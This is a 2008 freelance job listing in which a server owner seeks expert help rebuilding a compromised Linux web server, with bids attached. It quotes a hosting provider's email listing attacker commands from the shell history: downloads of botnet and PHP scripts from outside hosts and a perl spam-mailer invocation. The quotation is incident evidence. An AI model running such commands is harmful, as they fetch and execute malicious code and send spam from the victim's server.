Project Detail

Compromised Linux Server - HELP!!  

Compromised Linux Server - HELP!! is project number 213479
posted at Freelancer.com.

 

 

Status:

Selected Providers: Aserdp

Budget: $100-300

Created: 01/14/2008 at 8:21 EST

Bid Count: 7

Average Bid: $250

01/17/2008 at 8:21 EST

Project Creator: paulmeakin
Employer Rating: 10/10 (4 reviews)
 

Description

OK...I have a self-managed Fasthosts Linux server that has been compromised badly!

I have over 50 web sites on it and data and I really need some expert help to get the server back on track. SSH is available and I think that is all! None of the web sites seem to be responding but I am unsure if the sites have been deleted or it is a server problem!

I cannot stress that I need a real expert that understands Linux, Mysql, phpmyadmin etc......please do not try for this job if you THINK you can do it...I NEED AN EXPERT...A GOOD EXPERT.

Below is the email from Fasthosts regarding the problems!

If you can help please get in touch......Thanks...Paul

EMAIL
Thank you for getting back to us. I can confirm that the passwords we provided are correct, and SSH is accessible using them. Unfortunately, the Matrix CP is not going to work, as most of it is completely missing. It would usually reside in the /opt folder, but this is not present. Also, whilst looking through the command history to see why this happened, I have found several suspicious-looking commands. Examples of this are:

lwp-download http://noden.110mb.com/botnet.txt
wget http://www.fb1.just-ribbit.com/lo0ol.php
lwp-download http://www.proxysxavast.xpg.com.br/email.txt
perl email.txt hehe.txt "" "Cartao com Carinho Para Voce" engTIM.html

There are lots more. It appears to me that the server has been compromised, and I must ask you to rebuild it as soon as is possible. There is no telling how far the attackers have got their claws into the server, and also no telling whether they have removed pertinent logfiles relating to it. They have had root access, so they have not been limited at all. - EMAIL ENDS


Additional information submitted:

01/14/2008 at 8:52 EST:
Also I will want all of the sites and databases (DB's are only small) taking from the server, the server rebuilding which is a function provided by Fasthosts server management area and then all of the sites reinstating along with the databases and phpmyadmin to manage them etc....basically save my sites and databases perform a server rebuild and reinstate on a rebuilt clean server.



 

250

0 days

01-14-2008 11:03 EST

Ready to do it.


 

150

0 days

01-14-2008 13:13 EST

Please check your PMs. Thanks, D.Kolev


 

300

0 days

01-14-2008 09:40 EST

Can start immediately. Please ask any questions in PMB. My feedback shows all my server administration experience.


 

200

0 days

01-14-2008 18:37 EST

Please check the private message for details.


 

250

2 days

01-14-2008 12:38 EST

Ready to begin. Please see PM.


 

300

5 days

01-14-2008 12:17 EST

Please see PMs for more details. Best regards, Creaws team.


 

300

2 days

01-14-2008 08:35 EST

(No Feedback Yet)

Please, read PMB.
